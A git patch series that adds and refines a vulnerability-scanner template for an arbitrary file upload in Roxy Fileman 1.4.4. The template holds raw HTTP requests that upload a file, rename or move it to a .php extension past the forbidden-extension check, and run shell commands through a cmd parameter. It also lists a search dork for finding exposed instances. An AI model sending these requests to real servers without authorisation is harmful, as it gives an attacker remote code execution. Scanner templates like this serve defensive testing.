From 5acefb95ae5f193131b1a34a34650f8151904ad3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Aug 2022 13:08:09 +0530 Subject: [PATCH 1/3] Create roxyfileman-fileupload.yaml --- misconfiguration/roxyfileman-fileupload.yaml | 105 +++++++++++++++++++ 1 file changed, 105 insertions(+) create mode 100644 misconfiguration/roxyfileman-fileupload.yaml diff --git a/misconfiguration/roxyfileman-fileupload.yaml b/misconfiguration/roxyfileman-fileupload.yaml new file mode 100644 index 0000000000..39635a54db --- /dev/null +++ b/misconfiguration/roxyfileman-fileupload.yaml @@ -0,0 +1,105 @@ +id: roxyfileman-fileupload + +info: + name: Roxy Fileman 1.4.4 - Arbitrary File Upload + author: DhiyaneshDK + severity: critical + description: | + The Roxy File Manager has a configuration setting named FORBIDDEN_UPLOADS,which keeps a list of forbidden file extensions that the application will not allow to be uploaded. This configuration setting is also checked when renaming an existing file to a new file extension.It is possible to bypass this check and rename already uploaded files to any extension, using the move function as this function does not perform any checks. + reference: + - https://www.exploit-db.com/exploits/39963 + metadata: + verified: "true" + google-dork: intitle:"Roxy file manager" + tags: roxy,fileman,rce,fileupload + +requests: + - raw: + - | + POST /php/upload.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6rbEqFAMRkE0RAB7 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 + Sec-Ch-Ua-Platform: "macOS" + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + + ------WebKitFormBoundary6rbEqFAMRkE0RAB7 + Content-Disposition: form-data; name="action" + + upload + ------WebKitFormBoundary6rbEqFAMRkE0RAB7 + Content-Disposition: form-data; name="method" + + ajax + ------WebKitFormBoundary6rbEqFAMRkE0RAB7 + Content-Disposition: form-data; name="d" + + /app/Uploads + ------WebKitFormBoundary6rbEqFAMRkE0RAB7 + Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.jpg" + Content-Type: image/jpeg + + + + ------WebKitFormBoundary6rbEqFAMRkE0RAB7-- + + - | + POST /php/renamefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 + Sec-Ch-Ua-Platform: "macOS" + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + + f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php + + - | + POST /php/movefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 + Sec-Ch-Ua-Platform: "macOS" + Origin: {{BaseURL}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + + f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php + + - | + GET /Uploads/{{randstr}}.php?cmd=id HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "uid=" + - "gid=" + - "groups=" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 02c6174964a0a54c24f8cbb6c61d98ced7e929f0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 23 Aug 2022 09:55:32 +0530 Subject: [PATCH 2/3] Update roxyfileman-fileupload.yaml --- misconfiguration/roxyfileman-fileupload.yaml | 33 +++----------------- 1 file changed, 5 insertions(+), 28 deletions(-) diff --git a/misconfiguration/roxyfileman-fileupload.yaml b/misconfiguration/roxyfileman-fileupload.yaml index 39635a54db..8846525ba7 100644 --- a/misconfiguration/roxyfileman-fileupload.yaml +++ b/misconfiguration/roxyfileman-fileupload.yaml @@ -11,21 +11,14 @@ info: metadata: verified: "true" google-dork: intitle:"Roxy file manager" - tags: roxy,fileman,rce,fileupload + tags: roxy,fileman,rce,upload,intrusive requests: - raw: - | POST /php/upload.php HTTP/1.1 Host: {{Hostname}} - Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6rbEqFAMRkE0RAB7 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 - Sec-Ch-Ua-Platform: "macOS" - Origin: {{BaseURL}} - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 ------WebKitFormBoundary6rbEqFAMRkE0RAB7 Content-Disposition: form-data; name="action" @@ -52,35 +45,21 @@ requests: - | POST /php/renamefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 - Sec-Ch-Ua-Platform: "macOS" - Origin: {{BaseURL}} - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php - | POST /php/movefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 - Sec-Ch-Ua-Platform: "macOS" - Origin: {{BaseURL}} - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php - | - GET /Uploads/{{randstr}}.php?cmd=id HTTP/1.1 + GET /Uploads/{{randstr}}.php?cmd=echo+"roxyfileman"+|+rev HTTP/1.1 Host: {{Hostname}} cookie-reuse: true @@ -88,12 +67,10 @@ requests: max-redirects: 2 matchers-condition: and matchers: - - type: word + - type: regex part: body - words: - - "uid=" - - "gid=" - - "groups=" + regex: + - "namelifyxor" - type: word part: header From 5cf317ff07ff3f679da5dcaaf899d1380b5314c7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 23 Aug 2022 10:03:40 +0530 Subject: [PATCH 3/3] Update roxyfileman-fileupload.yaml --- misconfiguration/roxyfileman-fileupload.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/roxyfileman-fileupload.yaml b/misconfiguration/roxyfileman-fileupload.yaml index 8846525ba7..cbcb05559f 100644 --- a/misconfiguration/roxyfileman-fileupload.yaml +++ b/misconfiguration/roxyfileman-fileupload.yaml @@ -11,7 +11,7 @@ info: metadata: verified: "true" google-dork: intitle:"Roxy file manager" - tags: roxy,fileman,rce,upload,intrusive + tags: roxy,fileman,rce,upload,intrusive,misconfig requests: - raw: